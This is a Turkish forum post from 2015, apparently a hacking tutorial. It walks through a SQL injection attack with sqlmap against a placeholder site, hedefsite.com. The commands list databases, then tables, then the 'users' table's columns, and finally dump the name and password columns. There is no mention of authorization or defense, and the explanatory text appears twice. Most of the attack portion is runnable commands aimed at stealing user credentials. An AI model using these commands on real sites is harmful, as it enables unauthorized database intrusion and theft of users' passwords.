06-06-2015 Saat: 12:46
Sağolsun zamanında S4cuRıTy EneMy diye bir abim vardı ondan öğrenmiştim çoğu şeyi. Buda onun konusu sayılrı zaten bunuda ondan öğrendim.
İlk olarak terminali açıp komutumuzu girelim.
gibi koddaki linki düzenleyip terminale yapıştıralım.
Komutu uyguladığımızda hedef sitenin db isimlerinin bulunmuş olduğunu göreceğiz.
2. komutumuzu kullanarak
Tabloları çekeceğiz veritabanından
3. komutta ise bize tablo isimlerini buldu arasından işimize yarıyacak olanı seçiyoruz benim işime yarıyan (users)
Bu komutumzda ise resimde gördüğünüz gibi sütunları buldu bizim işimize yarıyan sütünlar ise (name) ve (password) sütunları.
Aynı şekilde şifremizide son komutumuzla bulalım. ;
İlk olarak terminali açıp komutumuzu girelim.
Kod:
Komut 1: sqlmap -u http://hedefsite.com/id.php?id=39 --dbs
gibi koddaki linki düzenleyip terminale yapıştıralım.
Komutu uyguladığımızda hedef sitenin db isimlerinin bulunmuş olduğunu göreceğiz.
2. komutumuzu kullanarak
Kod:
sqlmap -u http://hedefsite.com/id.php?id=39 -D wreps_2013 --tables
Tabloları çekeceğiz veritabanından
3. komutta ise bize tablo isimlerini buldu arasından işimize yarıyacak olanı seçiyoruz benim işime yarıyan (users)
Kod:
Komut 3: sqlmap -u http://hedefsite.com/id.php?id=39 -D wreps_2013 -T users --columns
Bu komutumzda ise resimde gördüğünüz gibi sütunları buldu bizim işimize yarıyan sütünlar ise (name) ve (password) sütunları.
Kod:
Komut 4: sqlmap -u http://hedefsite.com/id.php?id=39 -D wreps_2013 -T users -C name --dump
Aynı şekilde şifremizide son komutumuzla bulalım. ;
Kod:
Komut 4: sqlmap -u http://hedefsite.com/id.php?id=39 -D wreps_2013 -T users -C password --dump